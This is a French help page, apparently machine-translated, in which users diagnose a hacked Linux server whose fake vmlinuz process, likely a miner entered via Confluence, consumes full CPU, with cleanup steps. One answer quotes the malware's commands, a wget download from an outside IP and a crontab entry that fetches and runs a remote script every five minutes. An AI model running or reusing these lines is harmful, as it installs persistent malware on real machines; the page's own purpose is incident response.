GNU/Linux >> Tutoriels Linux >  >> Linux

Le processus vmlinuz s'exécute sur 100 % du processeur

Votre serveur semble piraté.Veuillez jeter un coup d'œil sur la liste des processus de près.e.g. exécuter ps auxc et jetez un oeil sur les sources binaires de processus.

Vous pouvez utiliser des outils comme rkhunter pour analyser votre serveur, mais en général, vous devez au début tuer tout ce qui a été déjeuné en tant qu'utilisateur de confluence, analyser votre serveur/compte, mettre à niveau votre confluence (dans la plupart des cas, la source d'attaque déterminée par l'utilisateur) et regarder dans votre confluence pour des comptes supplémentaires etc.

Si vous souhaitez voir ce qui se passe dans ce processus, jetez un œil sur /proc, par exemple. en ls -la /proc/996 . Vous y verrez également le binaire source. Vous pouvez également déjeuner strace -ff -p 996 pour voir quel processus est en train de faire ou cat /proc/996/exe | strings pour voir quelles chaînes ont ce binaire. Il s'agit probablement d'une sorte de partie de botnet, de mineur, etc.


J'ai eu le même problème, il a été piraté, le script du virus était à / tmp, trouvez le nom du script de la commande "top" (lettres d'insignifiance, le nom de "fcbk6hj" était le mien. ) et tuez les processus (peut-être 3 processus)

racine 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKglroot 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHlroot 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot

tuez-les tous et supprimez /tmp/prot, et tuez le processus de /boot/vmlinuz, le CPU est de retour.

J'ai trouvé que le virus avait automatiquement téléchargé le script sur /tmp, ma méthode était mv wgetak à un autre nom.

Comportement du virus :wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo

trouvé la tâche suivante a été écrite dans crontab, supprimez-la simplement :*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 &&bash /tmp/seasame


Après avoir supprimé ceci du système et de la crontab, c'est peut-être une bonne idée (du moins pour l'instant) d'ajouter l'utilisateur de confluence à /etc/cron.deny .

Et après :

$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information

Linux

  1. Comment limiter l'utilisation du processeur d'un processus sous Linux

  2. Pourquoi la machine virtuelle Windows 10 affiche-t-elle toujours une utilisation du processeur à 100 % sur QEMU-KVM ?

  3. Comment trouver quel processus provoque une utilisation élevée du processeur

  4. Comment enregistrer l'utilisation du processeur par processus ?

  5. Utilisation du processeur Linux et historique d'exécution des processus

Conseils pour le haut :surveiller la charge du processeur sous Linux

Comment créer une charge CPU à 100 % sur un système Linux

Comment obtenir l'utilisation du processeur d'un seul processus sous Linux

Correction de gvfsd-smb-browse prenant 100 % de CPU dans Ubuntu

Kswapd0 prend 100% de temps CPU sur Ubuntu 18.04 ?

Ralentissez un seul processus pour réguler la température du processeur